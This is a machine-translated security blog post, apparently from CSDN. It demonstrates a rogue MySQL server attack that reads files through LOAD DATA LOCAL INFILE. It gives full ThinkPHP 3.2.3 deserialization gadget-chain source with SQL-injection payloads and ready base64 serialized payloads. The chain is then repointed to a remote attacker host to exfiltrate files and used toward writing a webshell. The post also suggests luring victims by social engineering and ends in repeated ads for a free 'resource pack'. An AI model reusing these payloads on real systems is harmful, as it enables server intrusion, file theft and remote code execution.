“Network Security” How to build a MySQL malicious server to read files?

Foreword

Note: This article does not involve research on MySQL protocol messages. It only explains the principles and does some demonstrations.

Although the threshold for direct use of building a MySQL malicious server to read files is relatively high, I personally feel that it is relatively new because I saw a relatively new way of using it on the Internet (using social engineering to lure users to connect to MySQL and then read user files). It’s interesting. I summarized the attack principles and attack methods, so I wrote this article.

Principle

Before elaborating on the specific principles, let me introduce a few SQL statements to facilitate subsequent understanding.

First create a new tmp.txt in the tmp directory

The content is as follows:

Then execute the following SQL statement to import the tmp.txt file into it:

mysql> load data local infile "/tmp/tmp.txt" into table test fields terminated by '\\
';
Query OK, 3 rows affected (2.63 sec)
Records: 3 Deleted: 0 Skipped: 0 Warnings: 0

mysql> select * from Test;
 + ------- +
| name |
 + ------- +
| admin |
| user |
|Lxxx|
 + ------- +
3 rows in set (0.00 sec)
  • The load data local infile statement will read the client’s local file
  • The load data infile statement will read the local file on the server
  • terminated by means split by a certain character, the default is Tab, here I set it to \\

At this time, it may be unclear, what is the server and what is the client?

Because under normal circumstances, debugging SQL is done on the local machine, and the database is also on the local machine. This situation results in that both the client and the server are local, which is a bit difficult to distinguish. I will briefly describe it with a picture below.

Locally, since the client and server are both on the same disk, files can be transferred to the database locally regardless of whether local is added or not. Later, we will talk about the vulnerability of using a MySQL malicious server to read files. It is necessary to use local to achieve the purpose of bringing out the files.

【→Get all resources at the end of the article←】
1. Network security learning route
2. Electronic books (white hat)
3. Internal video of a major security company
4. 100 src documents
5. Common security interview questions
6. Analysis of classic questions in ctf competition
7. Complete tool kit
8. Emergency response notes

I drew two pictures below. The first picture is the normal business process, and the second picture is the malicious attack process by the attacker.

The normal back-end business process is as follows:

When an attacker hijacks the backend server and builds a malicious MySQL on the public network, the flow chart is as follows:

In this way, the attacker can achieve the purpose of downloading arbitrary files on the back end.

Demo

Although there has been a similar question in a previous CTF competition, here I still use the deserialization vulnerability in ThinkPHP3.2.3, combined with the MySQL malicious server to read sensitive files, and then use the RCE example.

First, start a ThinkPHP3.2.3 framework locally, connect to the database, and
Write a deserialization entry in the Application/Home/Controller/HelloController.class.php controller.

<?php
namespace Home\Controller;

use Think\Controller;

class HelloController extends Controller
{<!-- -->
public function index($Lxxx){<!-- -->
echo base64_decode($Lxxx);
$a = unserialize(base64_decode($Lxxx));
}
}

I will not follow the specific chain. There are many online. Although I will not follow up on the specific methods of the chain, I still need to introduce what role this chain can play.

  1. First of all, a deserialization entry is needed. This is undoubtedly true. Without a deserialization entry, deserialization cannot be performed, so above I wrote a deserialization entry in the HelloController controller;
  2. The final end of this chain requires database-related information, such as database name, database port, database user and password, and this chain allows stack injection, so if you know the database-related information, you can use stack injection Write a sentence of Trojan and then getshell.

Here I will directly release the chain, and then demonstrate how to build a malicious MySQL database, obtain sensitive files, and then getshell.

<?php
namespace Think\Db\Driver{<!-- -->
use PDO;
class Mysql{<!-- -->
protected $options = array(
PDO::MYSQL_ATTR_LOCAL_INFILE => true // Enable to read files
);
protected $config = array(
"debug" => 1,
"database" => "tp323",
"hostname" => "127.0.0.1",
"hostport" => "8889",
"charset" => "utf8",
"username" => "root",
"password" => "root"
);
}
}

namespace Think\Image\Driver{<!-- -->
use Think\Session\Driver\Memcache;
class Imagick{<!-- -->
private $img;

public function __construct(){<!-- -->
$this->img = new Memcache();
}
}
}

namespace Think\Session\Driver{<!-- -->
use Think\Model;
class Memcache{<!-- -->
protected $handle;

public function __construct(){<!-- -->
$this->handle = new Model();
}
}
}

namespace Think{<!-- -->
use Think\Db\Driver\Mysql;
class Model{<!-- -->
protected $options = array();
protected $pk;
protected $data = array();
protected $db = null;

public function __construct(){<!-- -->
$this->db = new Mysql();
$this->options['where'] = '';
$this->pk = 'id';
$this->data[$this->pk] = array(
"table" => "tp_user where 1=updatexml(1,concat(0x7e,version(),0x7e),1)#",
"where" => "1=1"
);
}
}
}

namespace {<!-- -->
echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}

The database information in the above chain is my local database information. After executing the file, I get the serialized string as follows:

TzoyNjoiVGhpbmtcSW1hZ2VcRHJpdmVyXEltYWdpY2siOjE6e3M6MzE6IgBUaGlua1xJbWFnZVxEcml2ZXJcSW1hZ2ljawBpbWciO086Mjk6IlRoaW5rXFNlc3Npb25cRHJpdmVyXE 1lbWNhY2hlIjoxOntzOjk6IgAqAGhhbmRsZSI7TzoxMToiVGhpbmtcTW9kZWwiOjQ6e3M6MTA6IgAqAG9wdGlvbnMiO2E6MTp7czo1OiJ3aGVyZSI7czowOiIiO31zOjU6IgAqAHBrIjtzOjI6ImlkIjtz Ojc6IgAqAGRhdGEiO2E6MTp7czoyOiJpZCI7YToyOntzOjU6InRhYmxlIjtzOjU5OiJ0cF91c2VyIHdoZXJlIDE9dXBkYXRleG1sKDEsY29uY2F0KDB4N2UsdmVyc2lvbigpLDB4N2UpLDEpIyI7 czo1OiJ3aGVyZSI7czozOiIxPTEiO319czo1OiIAKgBkYiI7TzoyMToiVGhpbmtcRGJcRHJpdmVyXE15c3FsIjoyOntzOjEwOiIAKgBvcHRpb25zIjthOjE6e2k6MTAwMTtiOjE7fXM6OToiACoAY29 uZmlnIjthOjc6e3M6NToiZGVidWciO2k6MTtzOjg6ImRhdGFiYXNlIjtzOjU6InRwMzIzIjtzOjg6Imhvc3RuYW1lIjtzOjk6IjEyNy4wLjAuMSI7czo4OiJob3N0cG9ydCI7czo0OiI4ODg5I jtzOjc6ImNoYXJzZXQiO3M6NDoidXRmOCI7czo4OiJ1c2VybmFtZSI7czo0OiJyb290IjtzOjg6InBhc3N3b3JkIjtzOjQ6InJvb3QiO319fX19

Pass to url

You can see that the error injection was successful.

Then, build a malicious MySQL service on the public Internet. This script has been written by seniors in Github. The specific principle is to analyze the relevant MySQL messages, then create a malicious connection with the back-end server, and obtain the files you want. .

After downloading the POC, modify the name of the file to be read.

Then use Python to start. After the startup is completed, the malicious MySQL is listening on port 3307.

python rogue_mysql_server.py

Next, modify the previous chain, change the IP and port to the remote malicious MySQL address, and then generate the chain.

<?php
namespace Think\Db\Driver{<!-- -->
use PDO;
class Mysql{<!-- -->
protected $options = array(
PDO::MYSQL_ATTR_LOCAL_INFILE => true // Enable to read files
);
protected $config = array(
"debug" => 1,
"database" => "tp323",
"hostname" => "1.1.1.1",
"hostport" => "3307",
"charset" => "utf8",
"username" => "root",
"password" => "root"
);
}
}

namespace Think\Image\Driver{<!-- -->
use Think\Session\Driver\Memcache;
class Imagick{<!-- -->
private $img;

public function __construct(){<!-- -->
$this->img = new Memcache();
}
}
}

namespace Think\Session\Driver{<!-- -->
use Think\Model;
class Memcache{<!-- -->
protected $handle;

public function __construct(){<!-- -->
$this->handle = new Model();
}
}
}

namespace Think{<!-- -->
use Think\Db\Driver\Mysql;
class Model{<!-- -->
protected $options = array();
protected $pk;
protected $data = array();
protected $db = null;

public function __construct(){<!-- -->
$this->db = new Mysql();
$this->options['where'] = '';
$this->pk = 'id';
$this->data[$this->pk] = array(
"table" => "tp_user where 1=updatexml(1,concat(0x7e,version(),0x7e),1)#",
"where" => "1=1"
);
}
}
}

namespace {<!-- -->
echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}

get:

TzoyNjoiVGhpbmtcSW1hZ2VcRHJpdmVyXEltYWdpY2siOjE6e3M6MzE6IgBUaGlua1xJbWFnZVxEcml2ZXJcSW1hZ2ljawBpbWciO086Mjk6IlRoaW5rXFNlc3Npb25cRHJpdmVyXE 1lbWNhY2hlIjoxOntzOjk6IgAqAGhhbmRsZSI7TzoxMToiVGhpbmtcTW9kZWwiOjQ6e3M6MTA6IgAqAG9wdGlvbnMiO2E6MTp7czo1OiJ3aGVyZSI7czowOiIiO31zOjU6IgAqAHBrIjtzOjI6ImlkIjtz Ojc6IgAqAGRhdGEiO2E6MTp7czoyOiJpZCI7YToyOntzOjU6InRhYmxlIjtzOjU5OiJ0cF91c2VyIHdoZXJlIDE9dXBkYXRleG1sKDEsY29uY2F0KDB4N2UsdmVyc2lvbigpLDB4N2UpLDEpIyI7 czo1OiJ3aGVyZSI7czozOiIxPTEiO319czo1OiIAKgBkYiI7TzoyMToiVGhpbmtcRGJcRHJpdmVyXE15c3FsIjoyOntzOjEwOiIAKgBvcHRpb25zIjthOjE6e2k6MTAwMTtiOjE7fXM6OToiACoAY29 uZmlnIjthOjc6e3M6NToiZGVidWciO2k6MTtzOjg6ImRhdGFiYXNlIjtzOjU6InRwMzIzIjtzOjg6Imhvc3RuYW1lIjtzOjc6IjEuMS4xLjEiO3M6ODoiaG9zdHBvcnQiO3M6NDoiMzMwNyI7 czo3OiJjaGFyc2V0IjtzOjQ6InV0ZjgiO3M6ODoidXNlcm5hbWUiO3M6NDoicm9vdCI7czo4OiJwYXNzd29yZCI7czo0OiJyb290Ijt9fX19fQ==

Passed to HomeController controller,

Then you can get the files that were maliciously downloaded before in mysql.log in the remote VPS.

Now that we have obtained the relevant database information, we can construct the chain again and use stack injection to write the one-sentence Trojan getshell.

Usage scenarios

  • When you can hijack the backend server but cannot getshell, you can use this method to getshell (for example, the utilization chain of ThinkPHP3.2.3 can only go to the database layer, you can use this method to getshell);
  • Can lure users into connecting to malicious MySQL (social engineering).

Network security learning resource sharing:

I would like to share with you a complete set of network security learning materials to give some help to those who want to learn network security!

For students who have never been exposed to network security, we have prepared a detailed learning and growth roadmap for you. It can be said to be the most scientific and systematic learning route. It will be no problem for everyone to follow this general direction.

Due to limited space, only part of the information is shown. If you need the full set of “Network Security Introduction + Advanced Learning Resource Package, you need to click the link below mark> to get it

Reader Benefits| CSDN Gift Pack: “Introduction to Network Security & Advanced Learning Resource Pack” Free Sharing ( Safe link, click with confidence)

Picture

At the same time, supporting videos are provided for each section corresponding to the growth route:

Picture

Practical training camp

Interview questions

Video supporting materials & domestic and foreign cybersecurity books and documents

Of course, in addition to supporting videos, various documents and books have also been compiled for everyone.

Picture
All materials total 282G. If you need the complete set of “Introduction to Network Security + Advanced Learning Resource Package”, you can scan the QR code or link below to get it for free~

Reader Benefits| CSDN Gift Pack: “Introduction to Network Security & Advanced Learning Resource Pack” Free Sharing ( Safe link, click with confidence)